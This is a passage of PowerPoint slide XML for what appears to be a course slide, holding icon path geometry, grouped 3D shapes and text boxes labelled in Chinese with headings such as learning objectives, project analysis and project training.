                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
